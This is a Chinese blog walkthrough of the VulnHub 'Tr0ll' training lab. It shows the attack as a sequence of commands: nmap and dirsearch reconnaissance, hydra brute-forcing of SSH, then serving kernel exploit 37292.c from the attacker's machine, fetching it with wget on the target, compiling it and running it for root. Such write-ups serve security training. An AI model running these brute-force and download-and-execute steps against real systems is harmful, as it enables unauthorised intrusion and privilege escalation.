Tr0ll靶场

最新推荐文章于 2024-05-31 11:03:01 发布
最新推荐文章于 2024-05-31 11:03:01 发布
阅读量27 收藏
点赞数
分类专栏: 渗透测试靶场 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61899124/article/details/131310776
版权

信息收集

主机发现

arp-scan -l

端口扫描

nmap -p- 192.168.164.170

目录扫描

dirsearch -u "http://192.168.164.170/"

访问目录什么都没有发现。。

尝试匿名登陆ftp

ftp 192.168.164.170
用户名:anonymous
密码:空

并且在ftp中发现一个流量包

pacp文件介绍

pcap文件是常用的数据报存储格式,可以理解为就是一种文件格式,只不过里面的数据是按照特定格式存储的,所以我们想要解析里面的数据,也必须按照一定的格式。普通的记事本打开pcap文件显示的是乱码,用安装了HEX-Editor插件的Notepad++打开,能够以16进制数据的格式显示,用wireshark这种抓包工具就可以正常打开这种文件,愉快地查看里面的网络数据报了,同时wireshark也可以生成这种格式的文件。

所以这里就先将他下载到本地,然后使用Wireshark打开查看

get lol.pcap

流量分析

发现有个secret_stuff.txt

打开后发现

发现了sup3rs3cr3tdirlol,尝试网站目录,访问一下

发现有一个名为roflmao的文件,下载查看

wget http://192.168.164.170/sup3rs3cr3tdirlol/roflmao

查看文件类型,发现他是一个ELF 32位LSB可执行文件

file roflmao

通过strings在对象文件或二进制文件中查找可打印的字符串,让我们找到地址0x0856BF

strings roflmao

访问0x0856BF目录

不能确定哪个才是真正可以登录的用户名,我们就使用hydra暴力破解看看

漏洞探测

将which_one_lol.txt下载到本地

wget http://192.168.164.170/0x0856BF/good_luck/which_one_lol.txt

使用hydra进行爆破:

hydra -L which_one_lol.txt -P pass.txt 192.168.164.170 ssh

后来才发现Good_job_:)不是密码!!!真正的密码就是文件名Pass.txt

登进去看看

ssh overflow@192.168.164.170

漏洞利用

查看一下靶机的内核版本信息

uname -a 
cat /etc/issue

一、查看Linux内核版本命令(两种方法)

1、cat /proc/version

2、uname -a

二、查看Linux系统版本的命令(三种方法)

1、lsb_release -a 即可列出所有版本信息,这个命令适用于所有的Linux发行版,包括RedHat、SUSE、Debain...等发行版

2、cat /etc/redhat-release 这种方法只适用于RedHat系的Linux

3、cat /etc/issue 此命令也适用于所有的Linux发行版

得到靶机为Ubuntu 14.04和3.13内核,根据内核版本去exploit-db找找看有没有可以利用的漏洞

提权

searchsploit 37292 //在kali本地exploit库搜索
locate linux/local/37292.c  //查看位置
cp /usr/share/exploitdb/exploits/linux/local/37292.c ./ //复制到目标目录
python -m http.server 8000 // 打开http服务
wget http://192.168.164.134:8000/37292.c //在shell 里面下载exp
gcc 37292.c -o 37292 //编译exp
./37292  //执行exp可执行文件

获得root权限后,查看proof.txt得到flag

仙322
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub-Tr0ll1靶机实战
千寻的博客
01-12 574
靶机下载地址 https://www.vulnhub.com/entry/tr0ll-1,100/ 环境: Vmware 15.5 靶机地址:192.168.246.128 kali地址:192.168.246.131 第一部分 信息收集 第一步 进行端口扫描,去发现存活主机,发现主机开放21、22、80端口 namp -sP 192.168.246.0/24 nmap -sS -sV -TS -A -P- 192.168.246.131 第二步 访问80端口 第三步 只能
vulnhub靶场- Tr0ll靶场
zzzzzzkeai的博客
11-27 690
vulnhub靶场--Tr0ll:1靶场
vulnhub靶机Tr0ll:1渗透笔记
weixin_52268949的博客
03-12 5180
Tr0ll:1渗透笔记 靶场下载地址:https://www.vulnhub.com/entry/tr0ll-1,100/ kali ip:192.168.20.128 靶机和kali位于同一网段 信息收集 首先通过nmap扫描靶机ip地址 nmap -sP 192.168.20.0/24 确定靶机ip 扫描开放端口 nmap -sV 192.168.20.129 发现21 和80 端口可能有用我们先来看看80端口 并没有发现什么信息我们使用dirb扫描一下目录 dirb http://192.1
vulnhub靶场--Tr0ll2靶场
zzzzzzkeai的博客
11-27 787
vulnhub靶场--Tr0ll2靶场
vulnhub靶场Tr0ll3靶场
zzzzzzkeai的博客
11-27 136
vulnhub靶场--Tr0ll3靶场
Tr0ll3 vulnhub靶场 (scp)
weixin_62621015的博客
03-13 166
Tr0ll3 vunlhub靶场个人通关笔记
Tr0ll2 vulnhub靶场(缓冲区溢出)
weixin_62621015的博客
03-12 728
Tr0ll2 vulnhub靶场(缓冲区溢出漏洞)
VulnHub靶机-Tr0ll
Slow_的博客
02-23 358
VulnHub靶机-Tr0ll 下载地址:https://www.vulnhub.com/entry/tr0ll-1,100/ 下载靶机后在VMware Workstation下打开,网卡配置为桥接 任务:提权并获取flag 攻击机:kali linux 192.168.8.195 靶机:192.168.8.165 文章目录VulnHub靶机-Tr0ll信息搜集二、内核提权 信息搜集 nmap探测存活主机,找到目标靶机 命令:nmap -sP 192.168.8.0/24 发现靶机IP为192.168.8
Tr0ll1靶机训练
m0_62709637的博客
02-21 311
Tr011打靶训练
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
tr0yyy
03-13
def tr0yyy (): full_name = 'Alexandru Nicoi' age = 20 email = 'alexandrunicoi@gmail.com' bachelor_degree = 'Computers and Information Technology' prog_skills = 'c++' + 'python' + 'java' + 'c' + ...
Linux tr命令的使用
01-09
tr用来转换或者删除一段文字。tr是translate(转换的缩写),功能的英文示意是:translate or delete characters。tr所有的功能均可由sed来完成,可以将tr视为sed一个极简的实现。 2.格式 tr [OPTION]... SET1 [SET...
TR181英文标准协议PDF
05-18
TR181英文标准协议
tr-181-2-17-0.pdf
04-17
TR181使用手册
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8254
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
信息安全法规和标准
m0_62207482的博客
05-28 974
自行建设韵味的政府网站不放在境外;39、据《计算机场地安全要求(GB/T9361-2011)》,计算机机房的安全等级分为 A:计算机系统运行中断后,会对国家安全、社会秩序、公共利益造成严重损害的对计算机机房的安全有严格的要求,有完善的计算机器机房安全措施 B级:计算机系统运行中断后,会对国家安全、社会秩序、公共利益造成较大损害的计算机机房的安全有较严格的要求,有较完善的计算机机房安全措施 C级: 不属于A、B级的情况,对计算机机房的安全有基本的要求,有基本的计算机机房安全措施。
网络安全的神秘世界】在win11搭建pikachu靶场
最新发布
weixin_54750312的博客
05-31 612
这个错误发生在mysql 5.7 版本及以上版本会出现的问题,在mysql5.7版本默认的sql配置是:sql_mode=“ONLY_FULL_GROUP_BY”,这个配置严格执行了"SQL92标准",很多从5.6升级到5.7时,为了语法兼容,大部分都会选择调整sql_mode,使其保持跟5.6一致,为了尽量兼容程序。访问http://pikachu/install.php,这是pikachu自带的初始化数据库的php文件。ok,重新访问首页(index.php),进行测试,成功解决。点击“安装/初始化”
web安全渗透测试工具篇(二):sqlmap常用命令和nmap常用命令
HACKONE的博客
05-26 196
这些选项可以用来创建用户自定义函数。--udf-inject 注入用户自定义函数--shared-lib=SHLIB 共享库的本地路径。
TR0 = ~TR0
12-08
TR0 = ~TR0是Python中的位运算符,表示按位取反。如果TR0是一个二进制数,那么~TR0将会把TR0中的每一位0变成1,1变成0。如果TR0是一个布尔值,那么~TR0将会把True变成False,False变成True。需要注意的是,~TR0并不...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值